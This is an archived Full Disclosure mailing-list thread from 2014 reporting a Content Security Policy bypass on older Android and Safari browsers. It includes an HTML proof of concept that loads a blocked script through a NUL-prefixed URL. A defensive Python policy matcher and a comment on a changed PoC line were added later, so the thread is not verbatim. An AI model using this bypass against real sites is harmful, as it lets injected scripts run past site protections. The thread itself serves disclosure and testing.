Full Disclosure mailing list archives
Fwd: Re: CSP Bypass on Android prior to 4.4
From: Vitor Ventura <ventura.vitor () gmail com>
Date: Tue, 14 Oct 2014 12:33:14 +0100
---------- Forwarded message ----------
From: "Vitor Ventura" <ventura.vitor () gmail com>
Date: 14/10/2014 12:32
Subject: Re: [FD] CSP Bypass on Android prior to 4.4
To: "E Boogie" <evanjjohns () gmail com>
Cc:

Hello,

My testing was done on a BQ Aquaris 5 HD with Android 4.2.1 using Chrome. It wasn't vulnerable.

Regards
VV

On 14/10/2014 00:12, "E Boogie" <evanjjohns () gmail com> wrote:
I've done a little more testing and what I've found is pretty startling. I tested on a Galaxy Note 2 running Android 4.4.2 and the CSP bypass worked. I also tested on an old version of Safari on an iPad (Safari/7534.48.3) and the CSP bypass also worked.

If you would be so kind, please use ejj.io/test.php to test this for me. If it worked, please press the "IT WORKED" button. This way I can compile a large fingerprint of browsers/phones/versions the CSP bypass worked on (based on user-agent).

Evan J.

On Sat, Oct 11, 2014 at 4:09 PM, E Boogie <evanjjohns () gmail com> wrote:

I've found a Content Security Policy bypass similar and related to the same origin policy bypass in CVE-2014-6041.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041

I've tested this on an Android 4.3 tablet running a bunch of different browsers, including Inbrowser, Firefox, and the default Android browser on an emulator for Android 4.3.1.

HTML PoC:

  <input type=button value="test" onclick="
    a = document.createElement('script');
    a.id = 'AA';
    /* NUL-prefixed URL: the bypass vector described in this thread */
    a.src = '\u0000https://js.stripe.com/v2/';
    document.body.appendChild(a);
    setTimeout(function () {
      /* Check whether the script actually ran: the Stripe global exists only
         if it loaded. (getElementById always finds the tag just appended, so
         the original typeof test on it could never reach the else branch.) */
      if (typeof Stripe !== 'undefined') { alert(Stripe); } else { alert(2); }
    }, 400);
    return false;">

The content security policy rule that should block this is

  script-src 'self' https://js.stripe.com/v3/ ;

The PoC worked if you see a popup containing Stripe's e(){} object. I set the Timeout kind of short, so you may have to press the button twice before you see the popup.

I have a PoC test page at ejj.io/test.php

Cheers,
Evan J

--
Evan J Johnson
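A reference script-src matcher, added here as an example and not code from the thread or from any browser: it checks a script URL against the policy quoted above the way CSP source matching is meant to work, refuses control characters before parsing so the NUL-prefixed URL cannot be reinterpreted by a lenient parser, and shows that the v2 URL is not permitted by a v3 source. The policy, URLs and page origin come from the thread; the function names are my own.

```python
from urllib.parse import urlsplit

DEFAULT_PORT = {"http": 80, "https": 443}
POLICY = "script-src 'self' https://js.stripe.com/v3/ ;"  # as quoted in the thread

def parse_script_src(policy):
    """Return the source expressions of the policy's script-src directive."""
    for directive in policy.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "script-src":
            return tokens[1:]
    return []

def host_source_matches(source, url):
    """Match one host-source expression (scheme://host:port/path) against a split URL."""
    scheme, sep, rest = source.partition("://")
    if not sep:  # bare host such as js.stripe.com: the page's scheme applies
        scheme, rest = url.scheme, scheme
    hostport, slash, path = rest.partition("/")
    host, _, port = hostport.partition(":")
    if scheme != url.scheme and not (scheme == "http" and url.scheme == "https"):
        return False
    if host.startswith("*."):
        if not url.hostname.endswith(host[1:]):
            return False
    elif host.lower() != url.hostname:
        return False
    if port and port != "*" and int(port) != (url.port or DEFAULT_PORT[url.scheme]):
        return False
    if slash and path:  # a path ending in '/' is a prefix; otherwise it must match exactly
        want = "/" + path
        return url.path.startswith(want) if want.endswith("/") else url.path == want
    return True

def script_allowed(policy, script_url, page_origin):
    """True if the policy's script-src permits script_url; page_origin is like 'https://ejj.io'."""
    # Refuse control characters before parsing. Lenient URL parsers (browsers, and urlsplit
    # in recent Python releases) strip leading C0 controls, so the NUL-prefixed URL from the
    # PoC would otherwise come out clean and the verdict would depend on who parsed it first.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in script_url):
        return False
    url = urlsplit(script_url)
    if url.scheme not in DEFAULT_PORT or not url.hostname:
        return False
    for source in parse_script_src(policy):
        if source == "'self'":
            if url.scheme + "://" + url.netloc.lower() == page_origin.lower():
                return True
        elif not source.startswith("'") and host_source_matches(source, url):
            return True
    return False
```

Any browser that loads the v2 script under this policy is not applying the source-expression rules above, regardless of how its URL parser treats the leading NUL.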
_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/